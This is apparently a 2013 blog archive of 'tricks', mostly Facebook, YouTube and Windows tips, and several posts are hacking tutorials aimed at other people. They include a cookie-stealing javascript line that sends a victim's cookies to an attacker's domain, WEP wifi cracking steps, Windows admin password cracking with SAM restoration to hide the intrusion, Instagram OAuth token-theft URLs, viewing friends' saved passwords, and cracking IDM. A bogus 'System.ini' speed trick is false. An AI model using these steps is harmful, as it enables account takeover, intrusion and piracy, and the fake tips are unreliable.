Tuesday 30 July 2013

how to change Facebook password without know old password

go to this link. https://www.facebook.com/checkpoint/checkpointme?f=113194692112762&r=web_hacked

how to see lock profile pic on fb

1.Visit Facebook.com. 2.Now open any profile that is locked and you want its profile pic to be enlarged. 3.Now just right click on the profile pic and click onCopy image URL. .4.Now you are going to get some URL like below. https://fbcdn-profile-a.akamaihd.net/hprofile-ak-ash3/c40.39.495.495/s160x160/550659_590311350997597_2018327603_n.jpg. 5.Now just remove thes160x160/part from the above URL and hit enter .6.Or just modify thats160x160 to s720x720it will enlarge image. 7.Now you are going to see the large size of that small locked image. 8.So its that easy now whenever you come across any locked profile, just follow this same steps to see the enlarged version of that image.How To View Locked Profile Picture In Facebook Do comment if any problem or like post tweet to your friends ask any question.

Saturday 27 July 2013

get 5000 friends on Facebook in a week

Add 5000 MASS Facebook FriendsIn this tutorial i will tell you how to add 5000 friends on your facebook friend list on facebook. All the emails that i have providedare real facebook users that use facebook daily. if you want your email to be added in the list. Comment your email. we will add your facebook email too.This is so simple trick Step 1.Download the 5000 email list. STEP 2.Copy all the Emails and paste into the invite friends tool.http://www.facebook.com/invite.php STEP 3.Then click on "Invite Your Friends" button. you're done now. you will get 5000 friends in less than 7 days. more emails more friends, so keep sharing. .Extra:If you want to promote yourbusiness. You can also copy all the emails and send an email to them.This Email will go to their email + in their facebook inbox too! If you want us to add your email Put it in a comment! Thanks for email list go to our page on Facebook and like us https://www.facebook.com/pages/Best-Blog/180530035425421

boost YouTube speed new tricks

TRICK TO BOOST BUFFERING SPEED OF YOUTUBETODAY IM GOING TO TEACH YOU HOW TO BOOST UP THE BUFFERINGSPEED OF YOUTUBE . THIS ARTICLE WILL BE MORE HELP FULL TO THE PEOPLE WITH SLOW INTERNET Step 1:Type : "System.ini" in Run. press ok.Step 2:A new notepad file will open Step 3:Copy paste the below code in that notepad file.page buffer=1000000Tbps load=1000000Tbps Download=100000Tbps save=1000000Tbps back=1000000Tbps search=1000000Tbps sound=1000000Tbps webcam=1000000Tbps voice=1000000Tbps faxmodemfast=1000000Tbps update=1000000Tbps Step 4:All the steps a completedNOW SAVE THE FILE AND RESTART THE COMPUTERRESTARTING THE COMPUTER IS MOST IMPORTANT FOR THE CHANGES TO TAKE PLACE IN PCAfter that open youtube and you will see the difference.

transform your image into Facebook chat smile

Transform Your Image Into Facebook Chat Smileys Are you bored with the old facebook chat smileys? Do you wantto create your own chat code for a new, cute and cool smiley in facebook? If yes, then you are at right place. In this tutorial we will learn how to create your own facebook chat code for a smiley in just 3 steps. You can use some smileys by some computer keyboard shortcut keys but here wewill create our own chat code for the smileys for free.You just have to select a picture from your computer then upload it and get a chat code for your own smiley in the facebook. I bet you that your friends will be asking you about it when you will use your own custom facebook smileys in the chat or will post the cool smileys on their status.How to create your own fb smileys chat code:-1.) Go toSmileychat codes.2.) Click onChoose Fileoption and select the image, from your computer, which you want to convert into smiley.3.) Now click onUpload nowoption and wait for the chat code. Once your chat code is generated, use it in yourfacebookaccount and impress your friends .KEEP SUPPORTING BY COMMENTING AND SHARING :)

how to crack idm

IDM 6.11 BUILD 8 WITH CRACK 1 download idm with from 2 after download file extract rar folder 3 rar folder contains 3 files a. idm.exe b. idm611.exe c. read first.txt 4 install idm611.exe then STEP TO CRACK IDM 1. install idman611.exe 2.now copy idm.exe and paste to (for 64 bit pc) C:\Program Files (x86)\Internet Download Manager (for 32 bit pc) C:\Program Files\Internet Download Manager {{{{ ie.=>> open c drive=>>then open program files(x86)=>> then open internet download manager folder =>> now paste idm.exe in folder=>> choose copy and replace }}}}} enjoy with cracked idm . note:- don't update idm. {when (after few day of installation) idm pop up a update notification then simply close that pop up window}

Friday 26 July 2013

how to create con folder

CON FolderHi guys, do u knw dat it is not possible to create a folder by name 'CON' (there are few others also i guess) as we create folders easily by any name. But if you want to create a folder by name CON, here's how u do it-Rename folder from the right click option.....Now press alt and press 255...OR alt and 0160press 255 frm the right sideof the key bords i.e., num padnow write con and then press enter,you ll see a con folder in ur pcIf ur cd drive is not shown in my computer then dont worry followthe step:1) Close all open programs2) Click on Start, Run, and type REGEDIT and press Enter3) Click on the plus signs (+) next to the following folders• HKEY_LOCAL_MACHINE• SYSTEM• CurrentControlSet• Control• Class• {4D36E965-E325-11CE-BFC1-08002BE10318}4) This folder is the DVD/CD-ROM Drive Class Description in the registry. Look for any of the following names in the right hand column.• UpperFilters• LowerFilters• UpperFilters.bak• LowerFilters.bak5) If any of the above keys shown in step 4 are listed, right-click on them and choose Delete6) After deleting the keys, close the RegistryEditor7) Reboot your computer8) Open My Computer and check to see if your CD or DVD drives have returned. You may also want to open Device Manager and verify that the yellow exclamation and error code on the CD or DVD drive is gone

how to make stylish Facebook

Trick To Install/Change Themes on Facebook with StylishOrkut gives you the option to change your profile theme but world’s most popular social networking website doesn’t provide you the ability to change theme of your profile.Now I am giving you something more i.e Trick to /Change themes on facebook and 45 beautiful facebook themes.If you are using facebook colour changer script then disable it from greasemonkey before using this Facebook theme trick.This trick has following requirementsMozzilla firefox browserStylish AddonSo here is the complete tutorial on how to install themes on facebook1. Open firefox browser.If you donot have you can download ithere2. Now Download Stylish addon for firefox by clickinghere.3. After installation is complete restart your browser4. Install Any of the themes below by clicking on the image5. To switch between the themes you have installed on your firefox browser gotoTools>Addons>Stylishand disable all

hack wifi by ultimate method

HACK WIFI PASSWORD IN WINDOWSFIRSTLY WE KNOW ABOUT HOW TO HACK WIFI PASSWORD AND WHAT TOOL ARE REQUIRED TO HACK WIFI PASSWORDTOOL REQUIRED FOR WIFI HACKING1. COMMVIEW FOR WIFI :-this tool is used for capturing the packet of wifi which we have to crack.this is also used for convert the file which is required for crack ( in this crack we convert .ncf file to .cap file)you can use this link to download this software2. AIRCRACK -NG :-this tool is used for retrieve password from captured file from commview for wifi softwareto download software STEP TO HACK WIFI NETWORK IN WINDOW:-1. install commview2. after installation a popup window is open in commview software for driver installation .( ifpop window not open then goto > help > driver installation guide then do this)3. install commview driver for your wifi network( without installation of driver you cannot capture data of desired wifi network)4. after installation of driver click on capture button on left corner ofsoftware.5. a pop up window is open and show wifi network near you.6. select wifi network which you want to hack and click on capture.you must need to see your connection is wep or not.(this trick only work with wep)7. after that you can see the commview capture wifi data.8. now goto to logging panel in commview and tick on auto saving and putmaximum directory size, mb - 2000average log file size- 209. now capture packets for 2-3 hour.( about 1 lakh packet)STEP TO CONVERT CAPTURED FILE.open commview and follow step1. goto file>log viewer2. after open log viewer3.goto file> load commview log> select all capture file > then open4. after opening goto>export logs> select wireshark tcpdump format5. save file with desired location (this file is used for cracking password)CRACK PASSWORD USING AIRCRACK-NG:-1. open download package.2. goto bin and open aircrack-ng GUI.exe3. open converted file4. select key size - 645. click on launch6. index no. of target file is-- 17 wait for cracking password8. if wifi password is cracked then it writepassword 100% decerypted 94:13:26:54:66in this password is 9413265466 forwifiIF NOT CRACKED IN FIRST ATTEMPT1. if password is not cracked then it say FAILED NEXT TRY WITH 5000 IVS.2. so we have to again capture packets and repeat above process again till password is crack.NOTE:-when we again capture packet and convert it into cap then we have to select all previous captured packet also to convert.

Thursday 25 July 2013

how to lock drive

>>Locking Drives:We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives arenot intended to be locked because they are mandatory for the system and application programs.*.Start&Runand typeRegeditto open Registry editor*.BrowseHKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer*.Create a newDWORDvalueNoViewOnDriveand set its value as2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26For example: to lock C:\, Alpha number of C is3 so 2^ (3-1) = 4(decimal value)*.Tolock more drives, calculate thevalue of each drive and then set sum of those numbers as value*.Tounlock your drivejustdelete the keyfrom the registry.

how to lock any folder

>>Locking Folders:*.Consider you want to lock a folder namedXXXXin your E:\, whose path is E:\XXXX.*.Now open the Notepad and type the following[code]ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code]*.Where xxxx is your folder name. Save the text file asloc.batin the same drive.*.Open another new notepad text file and type the following[code]ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx[/code]*.Save the text file askey.batin thesame drive.Steps to lock the folder:*.To lock thexxxxfolder, simply click theloc.batand it will transform into control panel icon which is inaccessible.*.To unlock the folder click thekey.batfile. Thus the folder will be unlocked and the contents are accessible.

Wednesday 24 July 2013

post status or comment in blue colour text

Now i share how to post blue colour text in facebook.follow the StepsStep1:Login to your Facebook Account.Step2:Now Go to your Status Update or any comment.step3:paste the Below Code in your Status Bar or comment box.@[1: ]@@[1:[0:1: Your TextHere ]]step4:then delete "your text here" and write your own text.step5:after writing your own text then press enter.Now you will see the text in blue colour. Share to your friends and write your comment.

download video from YouTube using uc browse

How to Download Youtube Videos through Ucweb browser?if you want to download the youtube videos?There is a simple trick to downloadyoutube videos via uc browser.in my lost post i share thefree youtube downloadernow i share download youtube videos for uc browser1.Open m.youtube.com and search any video.2.Then, move the cursor on that video's text not on video's image.3.then, press 1.4.It will display a menu. In this menu click on page info.5.now it display the two url.copy the second url.6.Then, open a new website.-online convert.com7.select video covert in this website.8.Then select any format i.e. 3gp,mp4.Then press go.9.paste the your youtube url in urlfield.10.now..It will start coverting.Then you have to wait 2 or 3 minutes.11.after waiting press "click here to refresh the status manually".now Your download link will appear..or another option is you put your email address on email field then the video download link was send to your email address.method 2: go to this siteyaayain this site are copy of the youtube.com. Additionaly this sitehave a downloading option.search any video like youtube then Download it.

send application using Bluetooth

now follow the steps to send a .jar application via bluetooth.1. first download any uc browser2.then browse and search any application and press download.3.now uc browser ask to yousaveorinstall4. just select save and download it5.after downloading close the browser and open your game or application.but this application are"not support" because this extension are _jar (not a .jar)for example it looks likeyour application_jarso this formate are correct to send via bluetooth between two devices.6.now send this application to any device via bluetooth7.after receiving the application just renameyour application_jartoyour application.jarthats all now the application works well in other mobile and you can send it to many mobile but the extension should be _jar.share this post if any problem then comment here...

download YouTube video from YouTube

downloading youtube videos in opera mini.follow the steps.1.open your opera mini.2.then go to m.youtube.com3. Then select bookmarks(#5) in your opera mini.4.select add bookmark and name it "youtube download"5. Then delete the address and paste the bellow javascript.6.save the bookmark.7.then select any video in youtube(click only on videos text not on image)8.after selecting video scroll down to bottom and select desktop view or classic view.9.Now go to your browser settings and off the "single column view".10.now browser ask to you reload the page-> press yes.11.after reloading the page select your "youtube download" bookmark. (#5 is a shortcut of opera mini 6 and higher versions)when you selecting your bookmarkthe page was automatically reloaded and the download option is appear in the bellow of video.12.press download and select any format like 3gp, mp4 etc.now the video is downloading.if any problem then comment here.

how to see stored password in uc browser

follow the steps to see the stored password in uc browser:1.go to any login page where the password are stored.2.move the cursor(arrow) to password field and dont click it.3.then press #5(quick Search)thats all now your stored passwordare displayed in your search engine.this same trick are used to view your friends facebook password or any other sites password.share this post.if any problem then comment here.and also tell me this trick areworked or not?

email hacking

Do U Think If Your Email Can Not Been Hackable, Then You Are Wrong...Ur Email-ID Can Be Hack... But Its Can Be Hack Only Fault by User.. Most Of The Peoples Think That Their Has A Software to Hack A Email- ID's But Truth Is Their Is No Software Present For Hacking Ur Mail ID's..Email Hacking can be possible to many ways like:-1. Social Engineering2.Phishing Attacks3. Cookie Hijacking4. By KeyloggersSocial Engineering:This Process is defined as Hack the human mind without any tools...This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn’t deal with the network security issues, vulnerabilities, exploits,etc. It just deals with simple Psychological tricks that help to get the information we want.This really works!! But it requires a lot of patience.We are all talking about network security and fixing the vulnerabilities in networks.But what happens if some internal person of a network accidentally gives out the passwords. After allwe are all humans; we are also vulnerable and can be easilyexploited and compromised than the computers.Social Engineering attacks have become most common during the chat sessions.With the increase in use of Instant Messengers, any anonymous person may have achat with another any where in the world. The most crucial part of this attack is towin the trust of the victim.Phishing Attack:The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise inan attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.Cookie Hijacking:In cookie hijacking we can hack email accounts very easily.. This trick is verydangereous because whenever user change a password then there is no need toattacker for again hack Email- ID ofvictim.Andit would take you to inbox of victim's yahoo account without asking for any password of victim account.Keyloggers:Keylogger is a software program or hardware device that is used to monitor and logeach of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Becausethese programs and hardware devices monitor the keys typed in auser can easilyfind user passwords and other information a user may not wish others to know about.Keyloggers, as a surveillance tool, are often used by employers to ensure employeesuse work computers for business purposes only. Unfortunately, keyloggers can alsobe embedded in spyware allowing your information to be transmittedto an unknown third party.Cookie Hijacking:U Can Hack Yahoo Account by Cookies Stealing or Hijacking From Browser.Follow Steps and Learn it.This is very Simple Tutorial and 100% Tested..!!..Step 1: Download the Script on given linkhttp://www.multiupload.com/9Q3EPTOO47Step:2 Download and extract files into your hard drive.Step:3 Create a account in any ftp hosting site i suggestedwww.t35.comStep4: Login to your account and upload 4 files into your ftp account.Step5: Give this code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.Stolen cookies get stored in directory 'cookies'javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));He would again redirected to his yahoo account.Step6. Open the hacked.php . The password is 'hoc'.You must have got the username ofvictim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password of victim account.

exploit

ExploitsA tool developed by hackers that is used to perform malicious attacks on computer systems. They are usually scripts that are designed to exploit weaknessness in software over a network, most commonly the Internet. Zero-Day is a common type of exploit.Zero-Day ExploitsCalled either Day Zero or Zero-Day,it is an exploit that takes advantage of a security vulnerability on the same day that the vulnerability becomes publicly or generally known. Zero-Day exploits are usually posted by well-known hacker groups. Software companies may issue a security bulletin or advisory when the exploit becomes known, but companies may not be able to offer a patch to fix the vulnerability for some time after.An exploit (from the same word in the French language, meaning"achievement", or"accomplishment") is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerised). This frequently includes such thingsas gaining control of a computer system or allowing privilege escalation or a denial of service attack.There are several methods of classifying exploits. The most common is by how the exploit contacts the vulnerable software. A 'remote exploit' works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A 'local exploit' requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system administrator. Exploits against client applications also exist, usuallyconsisting of modified servers that send an exploit if accessed with client application. Exploits against client applications may also requiresome interaction with the user and thus may be used in combination with social engineering method. This is the hacker way of getting into computers and websites for stealing data.In computing, an exploit is an attackon a computer system, especially one that takes advantage of a particular vulnerability that the system offers to intruders. Used as a verb, the term refers to the act ofsuccessfully making such an attack.In Exploit another classification is by the action against vulnerable system: unauthorized data access, arbitrary code execution, denial of service.Many crackers (or hackers, if you prefer that term) take pride in keeping tabs of such exploits and post their exploits (and discovered vulnerabilities) on a Web site to share with others.Where an exploit takes advantage of a weakness in an operating system or vended application program, the owners of the system or application issue a "fix" or patch in response. Users of the system orapplication are responsible for obtaining the patch, which can usually be downloaded from the Web. Failure to install a patch for a given problem exposes the user to a security breach. (However, it can be difficult to keep up with all the required patches.)Many exploits are designed to provide superuser-level access to a computer system. However, it is also possible to use several exploits, first to gain low-level access, then to escalate privileges repeatedly until one reaches root.Normally a single exploit can only take advantage of a specific software vulnerability. Often, when an exploit is published, the vulnerability is fixed through a patch and the exploit becomes obsolete for newer versions of the software. This is the reason why some blackhat hackers do not publish their exploits but keep them private to themselves or other crackers. Such exploits are referred to as 'zero day exploits' and to obtain access to such exploits is the primary desire of unskilled attackers, often nicknamed script kiddies.Script KiddieA person, normally someone who isnot technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to targetspecific information or a specific company but rather uses knowledge of a vulnerability to scanthe entire Internet for a victim thatpossesses that vulnerability.The vast majority of the "hacker" underground is made up of people who have only been using computers for a few years and who really know comparatively little about them. These are people, usually kids, who are attracted by the seemingly magical powers that hacking gives them. Since they know so little about computers, they don't really known how to hackthemselves but instead follow recipes or "scripts" developed by real hackers. Most of these scripts are easy-to-use programs whereby the "script-kiddy" simply enters theIP address of the victim.One of the distinguishing features of script-kiddies is that they must have a lot of patience. Because security holes are quickly found andrepaired, most systems will resist most attacks. Therefore, if the script-kiddy is targeting a single system, they have to find a lot of scripts to try against the system before they find one that works. More commonly, the script-kiddies downloads one of the most recentlydeveloped scripts and proceeds to run it against targets all throughout the Internet until they find someone who is vulnerable to that specific script.

hack instagram account

critical vulnerability in Instagram. Succesful hack allows attacker to access private photos and ability to delete victim's photos, edit comment and post new photos.1. Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)He reported a few issues to Instagram Include OAuth Attacks, But the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram, So I was waiting, Waiting like a good WhiteCollar, Then Facebook Security send me a message, They say even that they was unable to fixthis issues because the acquisition didn’t closed yet, They will still payout for this vulnerabilities,So, first, checked Instagram’s OAuth protocol: (http://instagram.com/developer/authentication/)While researching Instagram’s security parameters, Nir noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.In addition, redirection was only allowed to go to the owner app domain.Thus, hacker needed to locate someother way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.Block Files FoldersFor example:Allow request:https://apigee.comBlock requests:Redirect_uri=https://www.breaksec.comRedirect_uri=https://a.apigee.com/Redirect_uri=https://apigee.com/x/x.phpRedirect_uri=https://apigee.com/%23,? or any special signAs it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send theaccess_token code to their own domain.For instance:Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.comIn this case, the redirect_uri parameter should allow redirectiononly to my domain (breaksec.com),right? What happens when we change the suffix in the domain to something like:Breaksec.com.mxIn this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).PoC Bypass (Fixed By Facebook Security Team):https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=tokenGame Over.Bug 2.With this bug, Nir used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).When you use the Instagram app, itcan be integrated with Facebook.For example:When a user wants to upload their Instagram photos to Facebook, theyallow this interaction and integration to take place.Instagram Would like to access yourpublic profile and friend listNir discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.This effectively allows the attacker to steal the access_token of any Instagram user,With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.PoC (Facebook Already fixed this issue): https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token

hack admin

Windows Password Storage path, Method of Encryption, and breaking into Windows by cracking the admin password. We need this often for many reasons:1)Sometime we have forgotten our old password and Hint isn't helping out.2)We want to break into someone computer to get the information.3)Just want to take revenge from someone.4)Stealing computer data.Lets, take a deep dive in Cracking Windowspassword and also where these are stored and in which format.SAM file and Password Hashes~Place where these passwords are stored in Hashes:Password Hashes - When you type your password into a Windows NT, 2000, or XP login Windows Seven, Vista etc Windows encrypts your password using a specific encryption scheme that turns your password into something that looks like this:7524248b4d2c9a9eadd3b435c51404eddc5This is a password Hash. This is what is actually being checked against when you type your password in. It encrypts what you typed and bounces it against what is stored in the Registry and/or SAM File.You can break this hash password fromwww.md5hash.comwww.passcracking.ruSAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.Location of SAM/Hashes:You can find what you're looking for in several locations on a given machine.It can be found on the hard drive in the folder %systemroot%system32config (i-eC:\windows\system32\config). However this folder is locked to all accounts including Administrator while the machineis running. The only account that can access the SAM file during operation is the"System" account.The second location of the SAM or corresponding hashes can be found in the registry. It can be found under HKEY_LOCAL_MACHINESAM. This is also locked to all users, including Administrator, while the machine is in use.(GO to Run and Type Regedit and Hit enter, Now scroll to HKEY_LOCAL_MACHINESAM, However you may not access to it.)So the two (Some other also) locations of the SAMHashes are:- %systemroot%system32config- In the registry under HKEY_LOCAL_MACHINESAMCracking or Breaking Into Admin Account:How to get Hashes form SAM file?Well, Below are the methods to do so:1)Well, the easiest way to do this is to bootyour target machine to an alternate OS likeNTFSDOSor Linux and just copy the SAM from the %systemroot%system32config folder.It's quick, it's easy, and it's effective. You can get a copy ofNTFSDOSfrom Sysinternals(http://www.sysinternals.com) The regular version ofNTFSDOSis freeware, which is always nice, but only allows for Read-Only access. This should be fine for what you want to do, however, if you're the kind of person that just has to have total control and has some money to burn. NTFSDOS Pro, which is also by Sysinternals has read/write access but it'll cost you $299.2)You can also get password hashes by using pwdump2 (Google It to get software~ Search at openwall.com). pwdump uses.DLL injection in order to use the system account to view and get the password hashes stored in the registry. It then obtains the hashes from the registry and stores them in a handy little text file that you can then paste them into a password cracking utility like l0phtcrack or John the ripper (Linux Based works well) also cain and abel can be used.3)Import Hashes directly from l0phtcrack,and let them open to you by cracking.Obtained Hashes? Now crack them:Well, as i have said that these can't be reversed but somehow automated famouscracking softwares can be used to achieve the target. Yes, it is possible, All we have to do is to have a bit patience. The software will use a lot of strings and will compare these hashes also, Inshort it will decode them.1)John the Ripper- John the Ripper is to many, the old standby password cracker. It is command line which makes it nice if you're doing some scripting, and best of allit's free and in open source. The only real thing that JtR is lacking is the ability to launch Brute Force attacks against your password file. But look at it this way, even though it is only a dictionary cracker, that will probably be all you need. I would say that in my experience I can find about 85-90% of the passwords in a given file by using just a dictionary attack.2)L0phtCrack- Probably the most wildly popular password cracker out there. L0phtCrack is sold by the folks at @Stake. And with a pricetag of $249 for a single user license it sure seems like every one owns it. This is probably the nicest password cracker you will ever see. With the ability to import hashes directly from the registry pwdump and dictionary, hybrid, and brute-force capabilities. No password should last long. Well, I shouldn't say "no password". But almost all will fall to L0phtCrack given enough time.Making Your Own Password in Windows:Injecting Password Hashes into the SAM:Easiest ways to gain Administrator privileges on a machine, is by injecting your own password hashes into the SAM file. In order to do this you will need physical access to the machine and a brainlarger than a peanut. Using a utility called "chntpw" by Petter Nordhal-Hagen you caninject whatever password you wish into the SAM file of any NT, 2000, or XP machine thereby giving you total control, just burn the .iso on a disk and use it. I would give a tip like backing up the SAM file first by using an alternate OS.Make a USB disk of linux or Windows Live dsik can also work. Go in, inject the password of your choosing. Login using your new password. Do what you need to do. Then restore the original SAM so that no one willknow that i was hacked.You need to have admin access to perform this change from the command line. This is an especially handy trick if you want to change a password on an account but you’ve forgotten the original (going through the Control Panel can require confirmation of the old password).Now we hack Admin Password To verify the user name, by simply typing net user, I get a list of all theuser names on that windows machine. Now, go to the command prompt and enter:cd\cd windows\system32net userIf there are people near you and you don’t want them to see the password you type, enter:net user *E.g. > net user username *> Type a password for the user:> Confirm the password:Another Easy method, Using ophcrack to Hack into Admin Account:Ophcrackis a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.This is a type of offline cracking, Just grab.iso of ophcrack fromhere. Burn it and enjoy using.1.Opchrack can crack passwords for Windows 7, Windows Vista, and Windows XP.2.Ophcrack can recover 99.9% of passwords from Windows XP, usually in a matter of seconds. Any 14-character or smaller password that uses any combination of numbers, small letters, and capital letters should be crackable.3.Ophcrack can recover 99% of passwords from Windows 7 or Windows Vista. A dictionary attack is used in Windows 7 and Vista.4.The Ophcrack LiveCD option allows for completely automatic password recovery.5.LiveCD method requires no installation in Windows, making it a safe alternative to many other password recovery tools.6.No Windows passwords need to be known to use the Ophcrack LiveCD to crack your Windows passwords.DownloadI think this ophcrack method is far better, Try this one just get a disk and write it, Or else USB disk can aslo be used.Some security Tips ~ Making strong passwords:Now, You might have come to know that how passwords can be cracked, So there are some tips for you.1)Do not make common passwords like 123456 or the one of your own name.2)Use @, *, # or other symbols in your passwords to ensure maximum security in this case John the ripper and Ophcrack and also other cracking tools may take long time, it will be frustrating for hacker.3)Keep changing your password. So, that if long time is taken by one hash to decode, until it decodes you have generated another hash.

how to remove timeline on Facebook

How To Remove Facebook Timelin 1st Method. Step1.First go toFacebook Developer Page. Where you created this app.Then Go to Edit App .Step 2.when you click on edit then you cansee on left corner Delete App. Just click on it .Step 3.Once you click on Delete App then its asking for Delete Confirmation.When You Confirm, then your Timeline will be disabled..Now Enjoy with your old FB profile:)2nd MethodMost of the people are not likedFacbook Timeline,so here we tell you the trick that how can you remove timeline from your facebook account.This trick is available for the Firefoxand Chrome users. I give you the trick for both of these browser users .Remove Facebook Timeline profile in Mozilla Firefox 1. Install the User Agent Switcher extension on your Firefox browser from the link given below.Install >>User Agent Switcher Firefox Extension2. Restart your Firefox browser andclick on the Switcher extension icon.3. Now click on the Internet Explorer option and then select the Internet Explorer 7.4. Visit your Facebook Timeline profile and refresh it to get back the old Facebook profile.Remove Facebook Timeline profile in Google Chrome 1. Make a Right Click on the Chrome browser launcher icon and then click on the Properties.2. Now lick on the Shortcut tab. Copy the code given below according to your requirement.Windows 7 users : –user-agent=”Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)”Windows XP users : –user-agent=”Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)”3. Paste this code in the Target box at the end of the line (after the chrome.exe)4. Now click on the Apply and then OK.5. Refresh your Facebook profile to get the old Facebook profile back.

proxy server and sites

Proxy servers:-Its allow for you to configure your browser to route your browser traffic through that machine, which then makes a request for a page onyour behalf, and then sends you theresults. These are usually used at no cost to the user. Since they are accessible to the public these are often quite slow. Please see instructions for using a proxy server.There are a variety of types of these proxy servers:*Transparent Proxy-This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, nottransparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.) This type of proxy server does not hide your IP address.*Anonymous Proxy-This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonableanonymity for most users. This typeof proxy server will hide your IP address.*Distorting Proxy-This type of proxy server identifies itself as a proxy server, but make an incorrectoriginal IP address available through the http headers. This type of proxy server will hide your IP address.*High Anonymity Proxy-This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.>>Proxy browser:-A proxy server acts as a security barrier between your internal network and the Internet, keeping others on the Internet from being able to obtain access to informationthat is located on your internal network.........and your browser is become like invible........its hide your ip. like you use china country proxy den opengoogle.comnow google will open in china language form............!~How to change proxy settingsin Browsers@ Mozilla Firefox1. Open Mozilla Firefox.2. Click on Tools then click on Options….3. Click on the Advance tab, then click on the Network sub-tab and finally on the Settings… button.4. Tick the Manual Proxy Configuration: radio button.5. In the HTTP Proxy: box, type the IP address of the proxy server.6. In the Port: box, type the in the port number that is used by the proxy server.7. Click OK to close the Connection Settings window.8. Click OK to close the Options window.9. DONE@ Internet Explorer1. On the Tools menu in Internet Explorer, click Internet Options, click the Connections tab, and then click LAN Settings.2. Under Proxy server, click to select the Use a proxy server for your LAN check box.3. In the Address box, type the IP address of the proxy server.4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer onthe local network (this may speed up performance).6. Click OK to close the LAN Settingsdialog box.7. Click OK again to close the Internet Options dialog box.@ proxy settings InGoogle Chrome.* To change proxy settings: Click"Customize and control Google Chrome" icon right under the"window close" button.* A popup menu will be dipslayed. Click "Options".* Select the "Under the Hood" tab.* Scroll down and Click "change proxy settings" button.* A popup dialog will be display. Select the Connections tab on this dialg.* If you are using LAN, click "LAN Settings" button. If you are using Dial-up or Virtual Private Network connection, select necessary connection and click "Settings" button.* Make sure the "automatically detect proxy settings" and "use a proxy automatic configuration script" options are not checked.* In the "Proxy Server" area, click the check box next to Use a proxy server for this connection.* If nessesary, enable "bypass proxy server for local addresses".* Click the "Advanced" button and set Proxy Server address (proxy IP),proxy server port.* Click OK.*done@ proxy settings in Safari.* To change proxy settings: Open Safari* Click Safari on top of the screen.* Click "Preferences".* In the menu bar at the top of the window, Click "Advanced".* Click on the "Change Settings" button next to the Proxies label* Click on the check box button next to Web Proxy (HTTP)* Enter proxy server and port information* Select "Apply Now" to save settings.* Done.Anti-Spam SMTP Proxy ServerThe Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open source platform-independent SMTP Proxy server which implements auto-whitelists, self learning Bayesian, Greylisting, DNSBL, DNSWL, URIBL, SPF, SRS, Backscatter, Virus scanning, attachment blocking, Senderbase and multiple other filter methods. Click 'Browse all files' to download the professional version 2.2.1 build12221.*.Multiple Weighted DNSBLs*.Multiple Weighted URIBLs*.Greylisting*.Weighted Regular Expression Filtering*.Bayesian*.Penalty 